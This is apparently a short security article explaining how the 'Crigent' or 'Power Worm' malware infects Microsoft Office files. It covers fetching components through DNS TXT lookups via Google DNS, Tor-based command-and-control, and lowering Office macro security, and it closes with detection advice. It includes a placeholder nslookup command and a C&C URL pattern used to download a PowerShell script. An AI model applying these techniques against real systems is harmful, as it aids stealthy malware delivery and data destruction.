Viruses and malware attacking the MS Office files is an age old favorite activity of hackers but the advent of new technologies such as cloud based technologies bring new sophistication to the hacking methods as is in the case of ‘Crigent’, or ‘Power Worm.’
Instead of creating executable code, ‘Crigent’ uses legitimate technologies such as Windows PowerShell, Google DNS servers and cloud storage such as Dropbox or Microsoft’s OneDrive. Thus, the suspicious activity is ignored by network administrators.
The attack can be divided into three logical main parts: acquiring the components; running commands; and infecting the files. These are briefly explained as follows.
Acquiring the components:
The process starts with a word or excel file on the computer that is infected with the virus. The attacker creates one subdomain each under two domains for which he has access to the DNS records. Instead of storing the files at an IP address which are pointed by these subdomains, the hacker stores a text (TXT) record in those DNS records which can be accessed by using public Google DNS server thus avoiding local DNS blocking. The command in Windows is:
nslookup -querytype=TXT {malicious domain} 8.8.8.8
In return, the hacker gets links two links each pointing to a legitimate cloud storage: Dropbox and OneDrive.
Running commands:
Tor and Polipo software, which are already installed, are used to access command-and-control server. The URL contains two GUIDs:
{C&C server}/get.php?s=setup&mom={GUID #1}&uid={GUID #2}
If the GUIDs, are correct then a PowerShell script is downloaded which contains all the codes necessary.
Infecting the files:
First, Crigent lowers the security settings of Microsoft Office using PowerShell to modify registry. Secondly, it disables all ‘alerts’ and ‘Macros’ so that the user is not alarmed. Thirdly, it searches for all word and excel files on the computer and converts all .DOCX and .XLSX files to .DOC and .XLS respectively and creates a Visual Basic module for them. Then deletes all the original files. When these files are opened then a chain reaction of infections starts which destroys all the files and makes them useless for the user resulting in potential loss of important data.
These attacks can be avoided by being vigilant and removing any Tor and Polipo software. Microsoft Office by default uses only .DOCX or .XLSX file extensions since 2007 so presence of large number of files in .DOC or .XLS format, if not done intentionally, should be suspicious as well.
